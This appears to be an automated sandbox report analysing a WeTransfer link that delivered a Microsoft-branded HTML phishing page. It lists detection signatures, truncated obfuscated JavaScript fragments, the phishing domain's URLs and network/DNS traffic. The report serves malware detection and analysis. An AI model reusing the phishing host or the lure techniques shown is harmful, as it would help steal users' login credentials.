Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_camp

Overview

General Information

Sample URL:https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_net
Analysis ID:1545583

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
HTML page contains obfuscated javascript
HTML page contains suspicious base64 encoded javascript
Phishing site detected (based on image similarity)
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML page contains string obfuscation
HTML title does not match URL
Invalid 'forgot password' link found
Invalid T&C link found
None HTTPS page querying sensitive user data (password, username or email)
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 2752 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6760 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 --field-trial-handle=1904,i,14989004330455612450,13381019782503513669,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7804 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5908 --field-trial-handle=1904,i,14989004330455612450,13381019782503513669,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6400 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utm" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
2.34.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlLLM: Score: 10 Reasons: HTML file with login form DOM: 2.22.pages.csv
    Source: Yara matchFile source: 2.34.pages.csv, type: HTML
    Source: https://low0qsz1te4er83672235911c6a3.fanaticsretailgroupindividual.icu/7f36373458358cf263ca7da717fa010767226105a5e0esec&uid=f253efe302d32ab264a76e0ce65be76967226105a5e12HTTP Parser: var a0_0x4ac5d7=a0_0x485f;(function(_0x2ad6d0,_0x1e92fe){var _0x19153e=a0_0x485f,_0x53ba26=_0x2
    Source: https://low0qsz1te4er83672235911c6a3.fanaticsretailgroupindividual.icu/js2_/672261074c75a-f42bf6dabf4f31e630a5e7a15a6d9043HTTP Parser: const a0_0x47f57a=a0_0x2f27;(function(_0x3079e9,_0x3793a3){const _0x2e177a=a0_0x2f27,_0x26bb5d=_0x30
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: Base64 decoded: document.write
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlMatcher: Found strong image similarity, brand: MICROSOFT
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: Number of links: 1
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: Base64 decoded: auth0|66eab4a1188fc758c32cb821
    Source: https://backgrounds.wetransfer.net/creator/landrover/2403/accordion/2_d6hcUN/index.html?_origin=https://nolan.wetransfer.net&_placement=desktop-web-rendererHTTP Parser: Found new string: script (function() {var u = 'https://googleads.g.doubleclick.net/dbm/ad?dbm_c=AKAmf-BQk01gIq-Fu29OPKxE-itqYUH_LDGOoh4OMiEwkVp_nVBrKK7tlMTAOPqVzayXLRRt6N_KujCLw6OA5uFxvL-DLqbP906Qt0fzCVA6NRWCXDHujp8-kUJWJKcPsxG_Ton7NtZxFBiQFrbMSPPlNokmxwSWDEzBIwKyEk2gBkTZkRIhphle_LE3Yy9HsDHTAp-k7kWTeS2cTySXSvY7Of9sjpQ5mPwpNYb7ZoujZscJXwXGJwo&dbm_d=AKAmf-CFG3Pkqo1ybsA9SMiWlRwYPlJYsLTK9YpXwLPQ3G6AxvpR2jq50FfcwTD-E_2ayHUn9ChxsjLkZxnshrOrKb5HA78se4JkzQlms87XA8Txnp4GfMZiwkGBnle-0_fbthD_G49CShk2QfTUVtU4D0qKaSaGVkGfnE786u_d_QVFm8mE2218o-lmo1ndu8vv0CwWhSpivV90uM5AF0OEPF8qI8F4Tv3CU8m1fF4W1xL03E66p78Agrm-vYne6ufIQ3P4Duwi8uouhA6kxpDaZAvNQ9A8YknV84kEFVohFBUXU8CumL24hl_0jhMX6vDN-nt1cyKsv07gw3mGbboul8xIfDvPycHtofvV2YG9Il_JDIjU2NEiR0Ou9QVMLZ3YPXJ2xP-CDAAJJ5YdYuwZ7Wu1urfayVrsKFieRdO_alhWatyRrTro7s8LgocBSqh9YQ-AmmkFH5ibPCtHBKcdMPMKk_JpOlIqmNYHRNqQYFUZUeTR6rP5AzmjzM4j4TJwmDghLuGpkY66HcDvWGcnJ3SSLjGl6Q96iDHSI3MPutf4KewW9LFRr1th8eob9jJcFpVywqVJXZhhgmUn29QHU3vPqkCg7SqQS23si9lYGTF38bIk-iO_cLvyGIGBC3eyTDNlk46iIAx9LULtCd0NPRnRq2vYDsw_fIDnRUEp_EYwlaZUqmpBgdr...
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: Title: 1b77f3746e40642bc155d6963744d0166722610424aed does not match URL
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: Invalid link: reset it now.
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: Invalid link: Terms of use
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: Invalid link: Privacy & cookies
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: Invalid link: Terms of use
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: Invalid link: Privacy & cookies
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: Invalid link: Terms of use
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: Invalid link: Privacy & cookies
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: Has password / email / username input fields
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: <input type="password" .../> found
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmHTTP Parser: No favicon
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: No <meta name="copyright".. found
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: No <meta name="copyright".. found
    Source: file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmlHTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49757 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49772 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49778 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:50053 version: TLS 1.2
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: global trafficDNS traffic detected: DNS query: wetransfer.com
    Source: global trafficDNS traffic detected: DNS query: cdn.wetransfer.com
    Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
    Source: global trafficDNS traffic detected: DNS query: tagging.wetransfer.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: ekstrom.wetransfer.net
    Source: global trafficDNS traffic detected: DNS query: auth-session-caching.wetransfer.net
    Source: global trafficDNS traffic detected: DNS query: privacy.wetransfer.com
    Source: global trafficDNS traffic detected: DNS query: bsp-proxy.wetransfer.net
    Source: global trafficDNS traffic detected: DNS query: experiments.wetransfer.com
    Source: global trafficDNS traffic detected: DNS query: analytics-v2.wetransfer.com
    Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
    Source: global trafficDNS traffic detected: DNS query: s.pinimg.com
    Source: global trafficDNS traffic detected: DNS query: js.adsrvr.org
    Source: global trafficDNS traffic detected: DNS query: c.amazon-adsystem.com
    Source: global trafficDNS traffic detected: DNS query: snowplow.wetransfer.com
    Source: global trafficDNS traffic detected: DNS query: api.pico.bendingspoonsapps.com
    Source: global trafficDNS traffic detected: DNS query: s.amazon-adsystem.com
    Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: e-10220.adzerk.net
    Source: global trafficDNS traffic detected: DNS query: insight.adsrvr.org
    Source: global trafficDNS traffic detected: DNS query: di.rlcdn.com
    Source: global trafficDNS traffic detected: DNS query: public.profitwell.com
    Source: global trafficDNS traffic detected: DNS query: ara.paa-reporting-advertising.amazon
    Source: global trafficDNS traffic detected: DNS query: nolan.wetransfer.net
    Source: global trafficDNS traffic detected: DNS query: match.adsrvr.org
    Source: global trafficDNS traffic detected: DNS query: ct.pinterest.com
    Source: global trafficDNS traffic detected: DNS query: pixel.rubiconproject.com
    Source: global trafficDNS traffic detected: DNS query: cm.g.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: ib.adnxs.com
    Source: global trafficDNS traffic detected: DNS query: lebowski.wetransfer.com
    Source: global trafficDNS traffic detected: DNS query: cdn.brandmetrics.com
    Source: global trafficDNS traffic detected: DNS query: www.facebook.com
    Source: global trafficDNS traffic detected: DNS query: download.wetransfer.com
    Source: global trafficDNS traffic detected: DNS query: collector.brandmetrics.com
    Source: global trafficDNS traffic detected: DNS query: low0qsz1te4er83672235911c6a3.fanaticsretailgroupindividual.icu
    Source: global trafficDNS traffic detected: DNS query: www.datadoghq-browser-agent.com
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: backgrounds.wetransfer.net
    Source: global trafficDNS traffic detected: DNS query: donny.wetransfer.com
    Source: global trafficDNS traffic detected: DNS query: p.tvpixel.com
    Source: global trafficDNS traffic detected: DNS query: ad.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: pixel.adsafeprotected.com
    Source: global trafficDNS traffic detected: DNS query: secure-gl.imrworldwide.com
    Source: global trafficDNS traffic detected: DNS query: ir.surveywall-api.survata.com
    Source: global trafficDNS traffic detected: DNS query: static.adsafeprotected.com
    Source: global trafficDNS traffic detected: DNS query: 83rlahvezbatmc6b7zf4tpedq4dzg1730306290.darnuid.imrworldwide.com
    Source: global trafficDNS traffic detected: DNS query: dt.adsafeprotected.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: aadcdn.msauthimages.net
    Source: global trafficDNS traffic detected: DNS query: z.moatads.com
    Source: global trafficDNS traffic detected: DNS query: htlb.casalemedia.com
    Source: global trafficDNS traffic detected: DNS query: a2372.casalemedia.com
    Source: global trafficDNS traffic detected: DNS query: cs.lkqd.net
    Source: global trafficDNS traffic detected: DNS query: k8s1-event-tracker-la.lb.indexww.com
    Source: global trafficDNS traffic detected: DNS query: dsum-sec.casalemedia.com
